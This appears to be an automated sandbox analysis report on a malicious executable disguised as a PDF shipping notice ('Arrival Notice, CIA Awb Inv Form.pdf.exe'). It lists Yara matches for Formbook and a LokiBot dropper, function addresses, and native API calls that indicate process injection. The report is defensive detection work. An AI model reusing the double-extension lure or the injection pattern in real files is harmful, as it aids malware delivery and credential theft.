Source: Yara match File source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Arrival Notice, CIA Awb Inv Form.pdf.exe
Executable has a suspicious name (potential lure to open the executable)
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe Static file information: Suspicious name
Uses 32bit PE files
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Detected potential crypto function
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EACA526 6_2_1EACA526
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9ED2EC 6_2_1E9ED2EC
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAB124C 6_2_1EAB124C
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F1380 6_2_1E9F1380
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EABF330 6_2_1EABF330
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA0E310 6_2_1EA0E310
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA3508C 6_2_1EA3508C
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F00A0 6_2_1E9F00A0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAB70F1 6_2_1EAB70F1
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA0B0D0 6_2_1EA0B0D0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAAE076 6_2_1EAAE076
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA1B1E0 6_2_1EA1B1E0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA051C0 6_2_1EA051C0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9EF113 6_2_1E9EF113
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA9D130 6_2_1EA9D130
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAC010E 6_2_1EAC010E
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA4717A 6_2_1EA4717A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FAD2EC 8_2_02FAD2EC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307F330 8_2_0307F330
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307124C 8_2_0307124C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FB1380 8_2_02FB1380
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FCE310 8_2_02FCE310
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0308010E 8_2_0308010E
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FCB0D0 8_2_02FCB0D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0305D130 8_2_0305D130
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FB00A0 8_2_02FB00A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF508C 8_2_02FF508C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0300717A 8_2_0300717A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FDB1E0 8_2_02FDB1E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FC51C0 8_2_02FC51C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0306E076 8_2_0306E076
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FAF113 8_2_02FAF113
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_030770F1 8_2_030770F1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FBC6E0 8_2_02FBC6E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03076757 8_2_03076757
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FC0680 8_2_02FC0680
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FE4670 8_2_02FE4670
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FDC600 8_2_02FDC600
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0305D62C 8_2_0305D62C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0306D646 8_2_0306D646
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FC2760 8_2_02FC2760
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FCA760 8_2_02FCA760
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307A6C0 8_2_0307A6C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_030336EC 8_2_030336EC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307F6F6 8_2_0307F6F6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0308A526 8_2_0308A526
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FC0445 8_2_02FC0445
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_030775C6 8_2_030775C6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307F5C9 8_2_0307F5C9
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0302D480 8_2_0302D480
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307FB2E 8_2_0307FB2E
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FDFAA0 8_2_02FDFAA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03034BC0 8_2_03034BC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307CA13 8_2_0307CA13
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307EA5B 8_2_0307EA5B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307FA89 8_2_0307FA89
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FFDB19 8_2_02FFDB19
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FC0B10 8_2_02FC0B10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FC28C0 8_2_02FC28C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FD6882 8_2_02FD6882
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FC9870 8_2_02FC9870
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FDB870 8_2_02FDB870
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FA6868 8_2_02FA6868
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307E9A6 8_2_0307E9A6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_030059C0 8_2_030059C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FEE810 8_2_02FEE810
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FC3800 8_2_02FC3800
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03060835 8_2_03060835
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FBE9A0 8_2_02FBE9A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03035870 8_2_03035870
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307F872 8_2_0307F872
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_030398B2 8_2_030398B2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_030718DA 8_2_030718DA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_030778F3 8_2_030778F3
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FB2EE8 8_2_02FB2EE8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0303FF40 8_2_0303FF40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FC1EB2 8_2_02FC1EB2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307FF63 8_2_0307FF63
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FE0E50 8_2_02FE0E50
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307EFBF 8_2_0307EFBF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03071FC6 8_2_03071FC6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FC6FE0 8_2_02FC6FE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03002E48 8_2_03002E48
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03060E6D 8_2_03060E6D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03070EAD 8_2_03070EAD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03079ED2 8_2_03079ED2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FCCF00 8_2_02FCCF00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FDFCE0 8_2_02FDFCE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307FD27 8_2_0307FD27
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FD8CDF 8_2_02FD8CDF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03077D4C 8_2_03077D4C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FC3C60 8_2_02FC3C60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FCAC20 8_2_02FCAC20
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FB0C12 8_2_02FB0C12
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0305FDF4 8_2_0305FDF4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0303EC20 8_2_0303EC20
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FC9DD0 8_2_02FC9DD0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0306EC4C 8_2_0306EC4C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FD2DB0 8_2_02FD2DB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0307EC60 8_2_0307EC60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03076C69 8_2_03076C69
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FC0D69 8_2_02FC0D69
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03059C98 8_2_03059C98
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0308ACEB 8_2_0308ACEB
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03047CE8 8_2_03047CE8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FBAD00 8_2_02FBAD00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281E26E 8_2_0281E26E
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281EB52 8_2_0281EB52
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281DE3A 8_2_0281DE3A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02809E4F 8_2_02809E4F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02809E50 8_2_02809E50
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02802FB0 8_2_02802FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02802D87 8_2_02802D87
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02802D90 8_2_02802D90
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 02FAB910 appears 268 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 0303EF10 appears 105 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 02FF5050 appears 36 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 03007BE4 appears 96 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 0302E692 appears 86 times
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: String function: 1EA47BE4 appears 96 times
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: String function: 1EA6E692 appears 86 times
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: String function: 1E9EB910 appears 268 times
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: String function: 1EA35050 appears 36 times
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: String function: 1EA7EF10 appears 105 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B6CC3A NtAllocateVirtualMemory, 1_2_02B6CC3A
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B6CF85 NtWriteVirtualMemory, 1_2_02B6CF85
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B72FF6 NtWriteVirtualMemory,K32GetDeviceDriverBaseNameA, 1_2_02B72FF6
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B6C7E5 NtWriteVirtualMemory,CreateFileA, 1_2_02B6C7E5
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B72905 NtProtectVirtualMemory, 1_2_02B72905
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B70C8F NtWriteVirtualMemory, 1_2_02B70C8F
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B718FC NtWriteVirtualMemory,LoadLibraryA, 1_2_02B718FC
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B6DB02 NtWriteVirtualMemory, 1_2_02B6DB02
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32EB0 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_1EA32EB0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32ED0 NtResumeThread,LdrInitializeThunk, 6_2_1EA32ED0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32E50 NtCreateSection,LdrInitializeThunk, 6_2_1EA32E50
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32F00 NtCreateFile,LdrInitializeThunk, 6_2_1EA32F00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32CF0 NtDelayExecution,LdrInitializeThunk, 6_2_1EA32CF0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32C30 NtMapViewOfSection,LdrInitializeThunk, 6_2_1EA32C30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32C50 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_1EA32C50
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32DA0 NtReadVirtualMemory,LdrInitializeThunk, 6_2_1EA32DA0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32DC0 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_1EA32DC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32D10 NtQuerySystemInformation,LdrInitializeThunk, 6_2_1EA32D10
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32B90 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_1EA32B90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32BC0 NtQueryInformationToken,LdrInitializeThunk, 6_2_1EA32BC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32B10 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_1EA32B10
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA329F0 NtReadFile,LdrInitializeThunk, 6_2_1EA329F0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32E80 NtCreateProcessEx, 6_2_1EA32E80
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32EC0 NtQuerySection, 6_2_1EA32EC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32E00 NtQueueApcThread, 6_2_1EA32E00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32FB0 NtSetValueKey, 6_2_1EA32FB0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32F30 NtOpenDirectoryObject, 6_2_1EA32F30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA33C90 NtOpenThread, 6_2_1EA33C90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32CD0 NtEnumerateKey, 6_2_1EA32CD0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32C20 NtSetInformationFile, 6_2_1EA32C20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA33C30 NtOpenProcessToken, 6_2_1EA33C30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32C10 NtOpenProcess, 6_2_1EA32C10
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32D50 NtWriteVirtualMemory, 6_2_1EA32D50
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32AA0 NtQueryInformationFile, 6_2_1EA32AA0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32A80 NtClose, 6_2_1EA32A80
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32AC0 NtEnumerateValueKey, 6_2_1EA32AC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32A10 NtWriteFile, 6_2_1EA32A10
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32B80 NtCreateKey, 6_2_1EA32B80
